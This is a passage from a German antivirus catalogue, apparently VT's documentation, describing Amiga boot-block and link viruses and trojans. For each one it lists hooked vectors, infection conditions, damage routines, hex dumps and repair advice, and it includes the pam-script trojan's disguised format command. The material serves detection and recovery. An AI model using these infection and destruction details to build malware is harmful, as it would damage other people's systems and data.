UND/ODER an einen Antivirusprogrammierer weiter- leiten wuerden. Danke Im Codierteil (nicht im DecodierHeader) ist zu lesen: 303cfd84 4eb60000 5b6d7554 4167654e 0<..N...[muTAgeN 315d0000 1].. - Mutation-Nation-Virus Link Mind. KS 37 Nicht Resetfest Fileverlaengerung: 1316 Bytes Verbogene Vektoren: Loadseg, FindTask Ueberlaeuft 3E8-, 3F0- und 3F1-Hunks Haengt sich hinter ersten Hunk. Starke Aehnlichkeit im Grundgeruest mit Ebola Mehrfach codiert Verwendet LEA mit ungerader Adresse Codierbyte wird mit SDFF006 geaendert. Fuer die Codierung wird in Abhaengigkeit von $DFF007 D0-D5 und A0-A5 verwendet. Im mehrfach mehrfach decodierten Linkteil ist zu lesen: 4e754475 70650000 536e6f6f NuDupe..Snoo 70446f73 20537570 706f7274 2050726f pDos Support Pro 63657373 0000536e 6f6f7044 6f730000 cess..SnoopDos.. 2d3d2a20 4d757461 74696f6e 204e6174 -=* Mutation Nat 696f6e20 56312e30 20627920 41495a20 ion V1.0 by AIZ 2a3d2d00 00000003 *=-..... ;.... 4ef900f8 274a0000 DEADC0DE 000003f2 N...'J.......... Speichereinbau: Zuerst Test auf SnoopDos (falls ja, nicht im Speicher ein- haengen). Test auf Dupe (Schutz fuer den Programmierer ????) Test ob Loadseg schon von Ebola verbogen (vergessen zu aendern oder nicht begriffen ??) Verbogener Loadseg-Vektor dient der Verseuchung. Verbogener Findtask-Vektor dient dem Programmierer wahrschein- lich als Selbstschutz. Linkablauf: Test auf Disk Val. Mind. 5 Bloecke frei File groesser #2000 und kleiner #300000 Bytes Test auf $DEADC0DE (schon verseucht s.o. eine 0 nicht O) Filename enthaelt nicht "." oder "-". UND uebernaechster Buch- stabe ( 2(a0) ) ist nicht a, e, n . Suche nach $4EAE ( jsr -xy(Lib-Base) ) ( xy ist variabel ) Falls gefunden, Test ob Abstand zu Hunkende kleiner $7FFE. $4EAE wird in $4EBA ( jsr Hunkende(PC) ) geaendert. Neu: !!! Schreibt Original-Comment Setzt Original-Protection-Bytes Schreibt Original-FileDate Wenn Sie also in VT-Prefs zeige FileDate und Protection-Bytes anschalten beim Filetest, koennen Sie leider keinen Unterschied mehr feststellen. Bei Filelaenge natuerlich schon, aber wer hat die im Kopf. Einzige Moeglichkeit waere hier mit VT ein LogFile mit allen Filelaengen von wichtigen Unterverzeichnissen anlegen zu lassen. Aber !!!! Wenn man vor einiger Zeit mit VT Pruefsummen berechnet haette, waere JEDES einzelne verseuchte File beim Filetest mit Pruef- summe SOFORT aufgefallen !!!! Aber wer denkt schon an Vorsorge- massnahmen, wenn alles laeuft (der Schutz von einigen dirs z.B. c, devs, l, libs usw. ). Weitere Schaeden: Sobald die Systemzeit den Wert $1A39 (19. Mai 1996) und eine Zaehlzelle den Wert $14 erreichen, erfolgt ein move.l $0,$4 . - MUTILATOR-Virus BB Namensbegruendung: siehe unten Fordert trackdisk.device NICHT Im Speicher immer ab $7CAD0 Verbogene Vektoren: Cool, DoIo Decodiert mit eori.b #$27,(a1)+ steht im Speicher: 00000000 00aa0c54 48495320 49532054 .......THIS IS T 4845204e 4557204d 5554494c 41544f52 HE NEW MUTILATOR 2d564952 55532021 000100d2 14425920 -VIRUS !.....BY 4d415820 4f462053 5441524c 49474854 MAX OF STARLIGHT 00000000 00005468 616e7820 746f2054 ......Thanx to T 68652045 78656375 746f7273 20666f72 he Executors for 20537072 65616469 6e672074 68697320 Spreading this 47524541 5420636f 64652021 20646f6e GREAT code ! don 653a202d 20313939 32202d20 00000000 e: - 1992 - .... Vermehrung: BB Vermehrung mit DoIo ist nur moeglich, wenn Speicher ab $C000000 vorhanden ist !!!! Schaeden: Sobald eine Zaehlzelle den Wert $e0 und eine andere den Wert 3 erreicht hat, Textausgabe (s.o.) - MVK 17.11.92 FileVirus Laenge: 1052 Bytes wird weitergegeben als MVK.lzh Laenge: 1171 Bytes Namensbegruendung: aus Readme.file in Archiv Laenge: 469 Bytes Yeah, SUPPLEX presents a new Mini-Virus-Killer !!! To Start write > MVK < and MVK is than aktiv in your Memory, don't panic it is not a Virus.......... MVK-Archiv contains : MVK.exe Readme.file ( You read this now ) Im File ist uncodiert zu lesen: 2A2C202F 41414600 F00F412E 492E442E *, /AAF.d.A.I.D. 53205649 5255532D 48554E54 455200FF S VIRUS-HUNTER.y Es handelt sich also um eine Meisterleistung: - jemand hat es geschafft L.A.D.S in A.I.D.S umzuwandeln. - jemand hat es geschafft mit einem UtilityPrg einen BB in ein ausfuehrbares Prg. umzuwandeln. - jemand hat es NICHT geschafft die codierte Graphik-Text-Routine zu aendern Es handelt sich also in Wirklichkeit um den LADS-BB-Virus. Lesen Sie bitte dort nach. Das Prg vermehrt sich NUR als BB. Da die DOS0-BB-Kennung fehlt, entsteht eine nicht bootbare Disk !!! VT erkennt im Speicher und beim FileTest LADS-Virus. - MwB-Virus BB ein echter Julie s.o. Da der Julie.BB nicht den ganzen BB braucht, hat es jemand geschafft, einen Text einzubauen, der NIE erreicht wird. VT erkennt weiterhin Julie . ccccc9df df000000 4d77422f 4777482f ........MwB/GwH/ 74686520 62657374 20696e20 686f6c6c the best in holl 616e6400 00000000 00000000 00000000 and............. - NANO File-Virus Laenge: 1484 Bytes KS2.04: ja Im Speicher immer ab: $7C000 Cool $7C0DE, OldOpenLib $7C1CC und SumKickData $7C3B2 Grundgeruest ist die Compuphagozyte-Familie, erweitert um zwei Ausgaberoutinen. Schreibt in erste Zeile der startup-sequence: $A0A0A0A0A0A0," ",$0A Schreibt sich als unsichtbares ($A0A0A0A0A0A0) Programm in die Root-Dir (erzwungen durch : ). Beim Test gab es Probleme fuer das Virus-Prg, die richtige Startup- Sequence-Laenge zurueckzuschreiben. Sie muessen also mit dem Total- verlust der Startup-Sequence rechnen. Weiterhin wird die startup- sequence immer wieder verseucht (Beispiel s.u.), OHNE Test auf schon veraendert. Also eine typische ANFAENGER-Programmierung. a0a0a0a0 a0a0200a a0a0a0a0 a0a0200a . . a0a0a0a0 a0a0200a a0a0a0a0 a0a0200a . . a0a0a0a0 a0a0200a 636c730a 0a020000 .cls..... Hat zwei Zaehlzellen: a) Ausgabe der Deutschlandfarben b) DisplayAlert: ... another masterpiece by N A N O !!! GREETINGS TO: Byte Bandit, Byte Warrior, DEF JAM, DiskDoktors FANTASY, Foundation For The Extermination Of Lamers, I.R.Q. Team, Obelisk Softworks Crew, S.C.A., UNIT A ... VT2.52 erkennt und loescht: 31.03.93 Bitte denken Sie daran, auch die startup-sequence zu aendern !!! - Nano 2 FileVirus Laenge: 1472 Bytes Im Speicher immer ab $7C000, Vektoren werden teilweise nach $7A000 gerettet. Namensbegruendung: Im File ist zu lesen: Virus in 9.91 by Nano (die Jahreszahl duerfte falsch sein) Ein codierter Bereich fehlt im Gegensatz zu CompuPhagozyte 8 ALLE verbogenen Vektoren und Routinen sind gleich, liegen aber natuerlich an verschobenen Speicherstellen, da der Eingangstext von CompuPhagozyte 8 laenger ist. Also lesen Sie bitte das gleiche Verhalten bei CompuPhagozyte 8 nach. Fehlerquelle2 : Das Virusteil verraet sich nach einem Reset und schreibge- schuetzter Disk mit einem SystemRequest: Volume xyz is write protected VT loescht Nano2 . Sie muessen mit einem Editor die 1.Zeile der Startup-sequence loeschen !!!!!! - NaST 29.03.92 File Laenge: 2608 Bytes auch KS2.04 Grundgeruest: BGS9 KickMem, KickTag, KickCheckSum, Openwindow (int.lib) Neu: $6c, FindTask, OldOpenLib, NewOpenLib dafuer fehlt decode BitPlanes Herkunft des Namens: 2x im Virus-File zu lesen verschiebt Orig-File unsichtbar nach c $A020A020A020202020A0202020A0 VT versucht zuerst rename und falls OrigFile nicht gefunden, wird angeboten das Virus-File allein zu loeschen. Dann muessen Sie aber wahrscheinlich die 1.Zeile der startup-sequence aendern. - Nasty-Nasty BB nur KS1.2 immer ab $7F000 Cool, DoIo, Userstate, Superstate, Alert Vermehrung und Schaeden: - BB - sobald die Zaehlzelle den Wert 5 erreicht hat: format Disk Das VirusPrg gibt keine Meldung aus. Im BB ist Nasty-Nasty! zu lesen. - NAZI-Virus BB s.u. SCA-PKK Virus - NComm32-Trojan Zerstoerungsfile siehe bei CoP-Trojan Anderer moeglicher Name: CIRCLE OF POWER Trojan - NEurOTiCDEatH-Virus Typ 1 Linkvirus Namensbegruendung: Im LinkTeil ist zu lesen: 00000000 2a5b6d75 54416765 4e325d2a ....*[muTAgeN2]* 000000a0 0d2d2d2d 3d5b204e 4575724f .....---=[ NEurO 54694320 44456174 48205d3d 2d2d2d20 TiC DEatH ]=--- Fileverlaengerung: #3400-4200 Bytes Nicht Resetfest Ab KS 2.04 Verbogene Vektoren: LoadSeg NewLoadSeg DoIo Das Virusteil soll ab 21. Jan. 97 aktiviert werden. Speicherverankerung: - Test ob schon im Speicher - Loadseg NewLoadSeg DoIo werden verbogen - Testet spaeter geladene Filenamen auf "v" oder "V". Linkvorgang: - Mit LoadSeg - Medium validated - File ausfuehrbar ($3F3) - CodeHunk wird gefunden ($3E9) - Ueberlaeuft $3F1-Hunks - Filelaenge groesser #16384 - File kleiner einem bestimmten Wert, abhaengig von der Gesamtblockzahl des Mediums. - Gesucht wird am Ende des 1.Hunks in einem Bereich von #32736 ($3ff0 x 2) nach bcc ($6v00wxyz), jsr xy ($4EBAwxyz) oder jsr -xy(a6) ($4EAE Fxyz) - Dieses LW wird durch bsr Virus ($6100wxyz) ersetzt - das Teil codiert sich immer neu mit $DFF007 Meldung: - Abhaengig von DateStamp ($4EC = 21:00) soll mit DisplayAlert (Text siehe oben) eine Ausgabe erfolgen. - Danach Reset Zerstoerung: - Mit DoIo - zerstoerter Block Blocknummer immer groesser #63 Am Blockanfang ist dann zu lesen: Z 12 Bl 20 00: 2d2d2d3d 5b204e45 75724f54 69432044 ---=[ NEurOTiC D 10: 45617448 205d3d2d 2d2d2020 28632920 EatH ]=--- (c) 20: 31393937 20506f6c 616e6400 78e97fd1 1997 Poland.x.. - Dieser Block ist NICHT zu retten VT versucht die Vektoren im Speicher zurueckzusetzen. VT versucht den Linkausbau bei einem ausfuehrbaren File. Hinweis: Falls Sie ein verseuchtes File kopieren und FileDate nicht mitnehmen, so kann das File noch einmal verseucht werden. - NEurOTiCDEatH-Virus Typ 2 Linkvirus Namensbegruendung: Im LinkTeil ist zu lesen: 3d5b4d74 675f3243 5d3d0000 00a00d2d =[Mtg_2C]=.....- 2d2d3d5b 204e4575 724f5469 43204445 --=[ NEurOTiC DE 61744820 32205d3d 2d2d2d20 20286329 atH 2 ]=--- (c) Fileverlaengerung: #3652-4452 Bytes Nicht Resetfest Ab KS 2.04 Verbogene Vektoren: LoadSeg NewLoadSeg DoIo Das Virusteil soll ab 28. Dez. 96 aktiviert werden. Speicherverankerung: - Test ob schon im Speicher - Loadseg NewLoadSeg DoIo werden verbogen - Testet spaeter geladene Filenamen auf "v" oder "V". Linkvorgang: - Mit LoadSeg - Medium validated - File ausfuehrbar ($3F3) - CodeHunk wird gefunden ($3E9) - Ueberlaeuft $3F1-Hunks - Filelaenge groesser #12288 - File kleiner einem bestimmten Wert, abhaengig von der Gesamtblockzahl des Mediums. - Gesucht wird am Ende des 1.Hunks in einem Bereich von #32736 ($3ff0 x 2) nach bcc ($6v00wxyz), jsr xy ($4EBAwxyz) oder jsr -xy(a6) ($4EAE Fxyz) - Dieses LW wird durch bsr Virus ($6100wxyz) ersetzt - das Teil codiert sich immer neu mit $DFF007 Meldung: - Abhaengig von DateStamp ($4EC = 21:00) soll mit DisplayAlert (Text siehe oben) eine Ausgabe erfolgen. - Danach Reset Zerstoerung: - Mit DoIo - zerstoerter Block Blocknummer immer groesser #63 Am Blockanfang ist dann zu lesen: Z 33 Bl 6 00: 2d2d2d3d 5b204e45 75724f54 69432044 ---=[ NEurOTiC D 10: 45617448 2032205d 3d2d2d2d 20202863 EatH 2 ]=--- (c 20: 29203139 39372050 6f6c616e 6400f94c ) 1997 Poland..L - Dieser Block ist NICHT zu retten VT versucht die Vektoren im Speicher zurueckzusetzen. VT versucht den Linkausbau bei einem ausfuehrbaren File. Hinweis: Falls Sie ein verseuchtes File kopieren und FileDate nicht mitnehmen, so kann das File noch einmal verseucht werden. - NEurOTiCDEatH-Virus Typ 3 Linkvirus Namensbegruendung: Im decodierten LinkTeil ist zu lesen: 3d5b4d74 675f3243 5d3d0000 00a00d2d =[Mtg_2C]=.....- 2d2d3d5b 204e4575 724f5469 43204445 --=[ NEurOTiC DE 61744820 33205d3d 2d2d2d20 20202863 atH 3 ]=--- (c Fileverlaengerung: #4064-4864 Bytes Nicht Resetfest Processor besser als 68000 Verbogene Vektoren: LoadSeg DoIo Das Virusteil soll ab 28. Dez. 96 aktiviert werden. Speicherverankerung: - Test ob schon im Speicher - Test ob Antivirusprg.e aktiv (z.B Vir...) - Loadseg und DoIo werden verbogen - Testet spaeter geladene Filenamen auf "v" oder "V". Linkvorgang: - Mit LoadSeg - Medium validated - File ausfuehrbar ($3F3) - CodeHunk wird gefunden ($3E9) - Ueberlaeuft $3F1-Hunks - Filelaenge groesser #12288 - File kleiner einem bestimmten Wert, abhaengig von der Gesamtblockzahl des Mediums. - Gesucht wird am Ende des 1.Hunks in einem Bereich von #32736 ($3ff0 x 2) nach bcc ($6v00wxyz), jsr xy ($4EBAwxyz) oder jsr -xy(a6) ($4EAEwxyz) - Dieses LW wird durch bsr Virus ($6100wxyz) ersetzt - das Teil codiert sich immer neu mit $DFF007 Meldung: - Abhaengig von DateStamp ($4EC = 21:00) soll mit DisplayAlert (Text siehe oben) eine Ausgabe erfolgen. - Danach Reset Zerstoerung: - Mit DoIo - zerstoerter Block Blocknummer immer groesser #63 - Routine: move.l d0,(a2,d1.w) Da das geschriebene LW (d0) sich IMMER aendert, kann VT so einen Block NICHT erkennen !!!! - Dieser Block ist NICHT zu retten VT versucht die Vektoren im Speicher zurueckzusetzen. VT versucht den Linkausbau bei einem ausfuehrbaren File. Hinweis: Falls Sie ein verseuchtes File kopieren und FileDate nicht mitnehmen, so kann das File noch einmal verseucht werden. - NEurOTiCDEatH-Virus Typ 5 Linkvirus Name NICHT nachvollziehbar, sondern uebernommen Im decodierten LinkTeil ist zu lesen: 8002ee58 32c04e75 00000002 00005b4d ...X2.Nu......[M 74675f33 415d0000 1bdf0000 00096100 tg_3A]........a. Im Vergleich zu Typ 3 habe ich also keinen Neuro..-Text gefunden Fileverlaengerung: groesser #6000 Bytes und kleiner #8000 Bytes (so war es bei meinen Tests) Nicht Resetfest Processor besser als 68000 Nicht alle Kickstart-Versionen Verbogene Vektoren: LoadSeg NewLoadSeg DoIo Das Virusteil soll ab 28. Dez. 96 aktiviert werden. Speicherverankerung: - Test ob schon im Speicher z.B. DebugData - Test ob Antivirusprg.e aktiv (z.B Xtruder) - Loadseg NewLoadSeg und DoIo werden verbogen - Testet spaeter geladene Filenamen auf "v" oder "V". Linkvorgang: - Mit LoadSeg und NewLoadSeg - Medium validated - File ausfuehrbar ($3F3) - CodeHunk wird gefunden ($3E9) - Ueberlaeuft $3F1-Hunks - Filelaenge groesser #32768 - File kleiner #286720 - Gesucht wird im 1.Hunks nach bcc ($6v00wxyz), jsr xy ($4EBAwxyz) oder jsr -xy(a6) ($4EAEwxyz) - Dieses LW wird durch bsr Virus ($6100wxyz) ersetzt - das Teil codiert sich immer neu mit $DFF007 Meldung: - KEINE Zerstoerung: - Mit DoIo Speichermuell schreiben - zerstoere Zufalls-Block in Abhaengigkeit von $DFF006 - Zufallsblock immer groesser #63 ($7E00) - VT kann so einen Block NICHT erkennen - Dieser Block ist NICHT zu retten VT versucht die Vektoren im Speicher zurueckzusetzen. VT kann nicht alle Files reparieren. Falls es zu Fehlerkennungen am File kommt, schicken Sie mir bitte solche Files. - New Age Virus Link Verbogener Vektor: DosWrite Verlaengert ein File um 668 Bytes KS 1.3: nein KS 2.0: ja mit Test ob in dos.lib $4EF9 verwendet wird Nicht Resetfest Verseuchte Files sind SELTEN lauffaehig. VT bietet nur loeschen an. Im verseuchten File ist uncodiert zu lesen: 4bc20000 00030032 4e657720 41676520 K......2New Age 56697275 7320a920 31393932 20427920 Virus . 1992 By 4576696c 204a6573 7573646f 732e6c69 Evil Jesusdos.li Vermehrungsbedingungen: File groesser 4096 Bytes File kleiner 65536 Bytes File ist ausfuehrbar 3F3 Die ersten vier Bytes im 1.Hunk enthalten nicht $4e75 oder $4AFC (wg. Lib) Das Teil schreibt sich an den Anfang des 1.Hunks und verschiebt den Rest. Die HUNK-Reloc-Behandlungsroutine ist so schlecht, dass kaum ein verseuchtes File richtig arbeiten kann. - Nibbler-Inst. Installer fuer Nibbler-Virus siehe unten Bekannter Filename: cpu Laenge: 4584 Bytes Das Virusteil sitzt mitten im 1.Hunk. So kann sich das Teil NICHT selbst anlinken. - Nibbler-Virus File Link anderer moeglicher Name: Biochip Fileverlaengerung: 924 Bytes ab KS2.04: ja Mehrfachlinks: ja (nach Virusprg. sollte das nicht sein) Namensbegruendung: im Linkteil ist uncodiert zu lesen: 2d6c0298 ff6c6000 02944e69 62626c65 -l...l`...Nibble 7220312e 30626574 61202d20 78782f78 r 1.0beta - xx/x 782f7878 202d2062 79204269 6f636869 x/xx - by Biochi 7020432e 20230000 p C. #.. Verbogener Vektor: LoadSeg Resetfest: Nein Link hinter den ersten Hunk. VT versucht Loadseg im Speicher zurueckzusetzen. VT versucht den Linkteil aus einem File auszubauen. Speicherverankerung: - VirusZ, SnoopDos usw. nicht im Speicher - LoadSeg wird verbogen Vermehrungsbedingungen: - File ist noch nicht verseucht (Test auf "OS") Diese Abfrage arbeitet bei hoeheren Prozessoren nicht richtig. Folge: Mehrfachlinks - Filename enthaelt nicht "VI","VW","VT" usw. - min. Filelaenge #2300 Bytes - File ausfuehrbar - 3E9-Hunk wird gefunden (Loop) Ueberspringt 3E8,3F0,3F1-Hunks usw. !!!!! - Disk validated - kein Fremdformat "BAD" oder NDOS - mind. 50 Block frei - RTS wird gefunden - RTS wird ersetzt durch bra.s Hinweis: Da die RTS-Suchschleife falsch programmiert ist (Anfaenger !!!), koennen nicht-lauffaehige Programme ent- stehen. - rettet FileProtection, FileComment und FileDate Die veraenderten Files waeren aber von aelteren VT-Vers. dennoch erkannt worden, wenn Sie Vorsorge getroffen haetten, und fuer die Files in c, devs, libs usw. mit VT vorher (!!!) Pruefsummen gebildet haetten. Das Teil meldet sich nicht. Hinweis: Falls Ihre HD sehr verseucht ist, dann beginnen Sie bitte mit dem C-Verz. (File-Speicher-File). Das haeufige Neueinlesen wird dadurch geringer. - NO BANDIT (siehe unten Virenfinder) - NoCare-Virus s.o. Labtec-Trojan - No head s.b. ByteBanditPlus - No Name 1 anderer und richtiger Name : Byte Bandit 2 kein FastMem, BeginIo, KickTag, KickCheckSum, Vec5 SpeicherLage ueber structMemList, Speicherreservierung fuer neuen BBVirus mit allocmem, Zaehlstelle: Virusstart + $1c Vermehrung: ueber BB Im BB lesbar: trackdisk.device (weit unten) ein ByteBanditClone, ohne Tastaturabfrage, nur 5 Kopien und kuerzer gesetzter Zeit - NoName2 BB Cool, DoIo, SumKickData auch KS2.04 Vermehrungszaehler: bei mir $269 Es ist mir ein Raetsel, warum dieser BB solange unbemerkt bleiben konnte. Im letzten Jahr hat es kein Virus weiter als $10 ge- bracht. Dann hat ihn jemand spaetestens entdeckt. ??? Erstinstallierung im Speicher von BB: Falls Cool und KickTag nicht Null oder DoIo nicht Original, dann RESET. Nach Installierung und Reset sichert der Virus sein Prg durch AllocAbs. Vermehrung und Schaden: ueber BootBlock Rueckgabewert von SumKickData in d0 enthaelt Wert aus $DFF006. Virus meldet sich NIE. Kein Name versteckt oder codiert, deshalb NoName2 . Im BB ist ab $264 trackdisk.device zu lesen. - No-Guru V2.0 Filelaenge: 1224 Bytes (mit PP-Data-Prg.teil) Nach meiner Meinung nur gefaehrlich fuer AmiExpress-Benutzer (hab ich nicht) verbiegt: Alert, Autorequest Textausgabe im Cli: u.a. Making life with AmiExpress just that little bit easier... Sucht nach bss:user.data ; Falls vorhanden werden $8000 Bytes geladen. Der geladene Teil wird nach renegade, jock rockwell oder spiral durchsucht und gegebenenfalls geaenderte Daten zurueckgeschrieben. Empfehlung: loeschen - NorthStar anderer Name: Starfire s.u. - NoVi (File) TerroristsClone s.u. Laenge:1612 Bytes Aenderungen: TTV1 geaendert in NoVi Orig-File wird jetzt nach sys:c/.fastdir,$A0 verschoben. - Nuked007 siehe bei SHIT - Obelisk1 ( Deutschlandfahne + Graphiktext) Einsprung:cool schreibt in Speicherstelle $00000060 das Wort GURU zerstoert damit den Ausnahmevector, der ins ROM IR-Ebene 7 zeigt !! - Obelisk2 Begin, KickTag, KickCheckSum, Vec5 Einsprung:KickTag ,drei ZaehlZellen, Ausgabe:Graphik- text mit FormatAndrohung, wird nur durch KopfAnschlag vorgetaeuscht !! Nachweis mit TrackDisplay !! Speicherstelle $60 s.o. - O.M.S.A Virus BB TimeBomb V1.0 Clone siehe unten Nur Texte geaendert. Text fuer DisplayAlert: 14486568 652e2e2e 4c6f6f6b 73206c69 .Hehe...Looks li 6b652079 6f757220 6469736b 20676f74 ke your disk got 20667563 6b656421 2054616b 65206120 fucked! Take a 73686f77 65722121 21000000 42b90007 shower!!!...B... Namensbegruendung: 4f2e4d2e 532e4120 76697275 73207631 O.M.S.A virus v1 2e302100 00000000 00000000 00000000 .0!............. - OP1 (Neuseeland) richtiger Name: Joshua - OPAPA Begin, KickTag, KickCheckSum, Vec5 Zaehlzelle: ja, Vermehrung: ueber BB jedes LW Textausgabe (ueber Graphik) OPAPA-VIRUS READY STEADY FORMAT Kopf steppt nach Track 0 alle LW Clone: 04.03.92 Text entfernt - Overkill VIRUS BB Block 0-3 auch KS2.04, immer ab $7F700 Cool, KickCheckSum,SumKickData, DoIo fordert trackdisk.device NICHT = auch HD !!!!!!! Namensbegruendung: decodiert ist im Speicher zu lesen: Overkill by the ENEMY ! Decodierroutineteil: sub.b d6,d5 move.b d5,(a5)+ holt 4 Bloecke: Block 0 u. 1 = Virus Block 2 u. 3 = OrigBB nicht codiert Vermehrung: Codiert jeden Virus fuer BB neu in Abhaengigkeit von $DFF006 speichert 4 Blocke ab, d.h. ein File das Block 2 u. 3 belegt, wird zerstoert. Schaden: (auch HD!!!!!!!!) - Bestimmt ueber $DFF006 eine Blocknummer - Schreibt ZWEI Bloecke (ist neu) mit Speicherinhalt. d.h. im unguenstigen Fall wird Block1 an das Ende eines Files und Block2 an den Beginn eines zweiten Files geschrieben. Diese Files sind NICHT zu retten. Im 1.ZerstoerungsBlock steht ab $22 Overkill by the ENEMY !. Da KEINE Blockaus- wertung erfolgt, kann auch ein Dir-Block, ListBlock usw. zerstoert werden. Versuchen Sie bitte mit disksalv zu retten, was noch brauchbar ist. Zyl 0 Block 55 ^ 0000: 0007f708 00000000 4afc0007 f7080007 ........J....... 0010: ff00011f 00450007 f7220007 f7220007 .....E..."...".. 0020: f7d64f76 65726b69 6c6c2062 79207468 ..Overkill by th 0030: 6520454e 454d5920 21002879 0007fab0 e ENEMY !.(y.... Sie sehen: Es kann auch den Rigid-Bereich erwischen !!! Mit OrigBB koennen Sie den Block2-3 nach Block0-1 kopieren und abspeichern. VT kennt BB und Speicher: 17.10.92 - pam-script-Trojan format dh0: Keine Vermehrung Keine verbogenen Vektoren Nicht resetfest VT bietet loeschen an. Es sind zwei Teile notwendig. a) startup-sequence: pamela2/freemem jpeg1 dh0: pics pam Das bewirkt in Wirklichkeit: pamela2/format drive dh0: name pam b) Ein aelterer format-Befehl (L: 12840), der in freemem umbe- nannt wurde. Weiterhin wurden einige ASCII-Zeichen umgeaendert. Die Laenge der Zeichenfolge wurde beibehalten (pics=name). Die Zeile in der startup-sequence soll dadurch einen anderen Sinn vorspielen. Format orig. Freemem 4e4f4943 4f4e5300 NOICONS. : 73686f77 70696300 showpic. 51554943 4b004646 QUICK.FF : 56455230 31007878 VER01.xx 53005573 6167653a S.Usage: : 78004a50 45472020 x.JPEG 20257320 44524956 %s DRIV : 20257320 70696373 %s pics 45203c64 69736b3e E <disk> : 20206c6f 61646572 loader 204e414d 45203c6e NAME <n : 206c6f61 64207878 load xx 616d653e 205b4646 ame> [FF : 616d653e 205b756e ame> [un 535d5b4e 4f49434f S][NOICO : 72656769 73746572 register 4e535d5b 51554943 NS][QUIC : 65642056 322e3031 ed V2.01 4b5d0a00 69636f6e K]..icon : 2e5d0a00 69636f6e .]..icon 2e6c6962 72617279 .library : 2e6c6962 72617279 .library 00004452 49564500 ..DRIVE. : 00006a70 65673100 ..jpeg1. 44524956 45004472 DRIVE.Dr : 44524956 45005479 DRIVE.Ty 69766520 6e6f7420 ive not : 70653a70 616d656c pe:pamel 666f756e 640a0000 found... : 6173686f 770a0000 ashow... 4e414d45 00004e41 NAME..NA : 50494353 00005049 PICS..PI 4d450000 496e7365 ME..Inse : 43530000 4c6f6164 CS..Load 72742064 69736b20 rt disk : 696e6720 70696373 ing pics 746f2062 6520696e to be in : 21212121 21202020 !!!!! 69746961 6c697a65 itialize : 20202020 20204849 HI 6420696e 20257320 d in %s : 54205245 5455524e T RETURN 616e6420 70726573 and pres : 21212120 20202020 !!! - PARADOX I KickTag, KickCheckSum, im Prg. DoIo u. $6c, immer $7F800 Vermehrung und Schaden: Bootblock Text sichtbar im BB: * A new age of virus-production has begun ... This time PARADOX brings you the "LOGIC BOMB" Virus !!! * - PARADOX II Kicktag, KickChecksum im Prg. DoIo u $6c, immer $7F000 verschluesselt mit move.b $DFF006,D1 und eor.b d1,(a0)+ Vermehrung und Schaden: Bootblock Text nach Entschluesselung: This is the second VIRUS by PARADOX - For swapping call: 42-455416 - ask for Hendrik Hansen - PARAMOUNT nur KS1.2 Kicktag, KickCheckSum, DoIo, immer $7F800 Byte-Warrior-Clone, loescht Cold und Cool fordert trackdisk.device NICHT Vermehrung:BB im BB zu lesen: PARAMOUNT SOFTWORKS usw. - PARATAX SCA-Clone, Cool immer 7EC3E, nur anderer Text - PARATAX II Disk-Dokters-Clone, nur KS1.2 da DoIo-ROMEinsprung Cold, Cool, DoIo, im Prg. Vec5 im BB sichtbar: PARATAX II clipboard.device durch ".dos.library" ersetzt je nach Zaehlerstand wird eigener BB geschrieben oder Disk ab Cylinder 40 (ROOT) formatiert - PARATAX III 16BitCrewClone s.o. Unterschied: The 16Bit Crew 1988 in PARATAX III (!!!) geaendert eine echte Meisterleistung - Parfum-Virus Saddam-Disk-Validator-Clone s.u. 6b2e6465 76696365 00010820 50617266 k.device... Parf 756d2056 69727573 00000000 03f30000 um Virus........ - PayDay BB eigentlich ein AntiVirusBB schauen Sie unten - pb-party-BBS-Trojan Zerstoerungsfile gegen BBS Laenge: 161984 Bytes Keine verbogenen Vektoren Nicht resetfest VT bietet Loeschen an Schaden: Mit Dos-Routinen soll userdata geloescht werden. Das File enthaelt fast nur Muell (um durch die Laenge glaubhaft zu erscheinen), der nie erreicht wird. Im File ist zu lesen: 00000000 74484520 7245414c 20684143 ....tHE rEAL hAC 4b455253 20665543 4b454420 794f5520 KERS fUCKED yOU 694e2074 48452062 4548494e 44210000 iN tHE bEHIND!.. 00006262 733a7573 65722e64 61746100 ..bbs:user.data. - pENTAGRAM-Trojan siehe bei WiREFACE-Trojan - PentagonCircle cool,kickchecksum Fastmem ja, im Speicher immer ab $7fb00, im Prg. noch DoIo testet auf einige Viren, Alert-Meldung Vermehrung: ueber BB Text im BB sichtbar: z.B. The Pentagon Circle VirusSlayer by Mr.Moutainlake! - Pentagon-defekt Es wird ein Pentagon-BB weitergegeben, in dem das 4.LW Null ist. Dieser Bootblock ist NICHT bootfaehig. - PentagonVirusSlayer2: cool, KickCheckSum, immer ab $7f000 Fastmem ja, im Prg. DoIo, Programmierung voellig anders als Pentagon, Alert-Meldung Vermehrung: ueber BB Text im BB sichtbar: z.B. The Pentagon Circle VirusSlayer 2 by Mr.Mountainlake! - PentagonVirusSlayer3: Cool, KickCheckSum, immer ab $7e000 Fastmem ja, im Prg. DoIo, FindResident Alert-Meldung Vermehrung: ueber BB Text im BB sichtbar: z.B. The Pentagon Circle VirusSlayer by Mr.Mountainlake! - PentagonCircle 4 cool,kickchecksum im Speicher immer ab $7fb00, im Prg. noch DoIo beim Booten immer GURU !!! Grund: es hat jemand geschafft "dos.libr" zu erzeugen. Der Rest fehlt. ABER !!!! bevor diese Fehlerquelle erreicht wird, wurde schon Cool verbogen. Wenn Sie jetzt nur 512 kb Chipmem haben und beim 2. Start die Maustaste druecken, wird der Bildschirm gruen. Jetzt legen Sie einen "echten" BB ein und schon kann sich der Pentagon-BB vermehren. Aber auch der vermehrte BB enthaelt obengenannten Fehler. Empfehlung deshalb : sofort loeschen - PERVERSE I anderer Name: BOOTX-Virus s.o. - PESTILENCE.BB-Virus Verbogene Vektoren: Cool, Disable, KickCheckSum, BeginIo DisplayAlert KS1.3 4MB : Ja KS2.04 mit 68030: Ja KS40.63 : Ja Fordert trackdisk.device: Ja Groessere Teile des BB.s sind codiert. Decodiert ist im Speicher zu lesen: 00067472 ..tr 61636b64 69736b2e 64657669 63650000 ackdisk.device.. 696e7475 6974696f 6e2e6c69 62726172 intuition.librar 79005045 5354494c 454e4345 2076312e y.PESTILENCE v1. 31352028 63292031 342f3035 2f393421 15 (c) 14/05/94! Versucht durch Anzeige eines sauberen BB.s zu taeuschen. Vermehrung: BB Schaeden: a) Ueberschreibt BB b) Fuellt die Disk in Abhaengigkeit von $DFF006 mit Muell. (move.l #$000D4800,$24(a1) ). So eine Disk koennen Sie leider ohne Bedenken neu formatieren. Da ist NICHTS mehr zu retten. Diese Routine laeuft selten bis zum Ende durch. Ueber Zyl.70 habe ich meist den GURU gesehen. c) Codiert Bloecke, die die Kennung #$00000008 (also kein FFS) 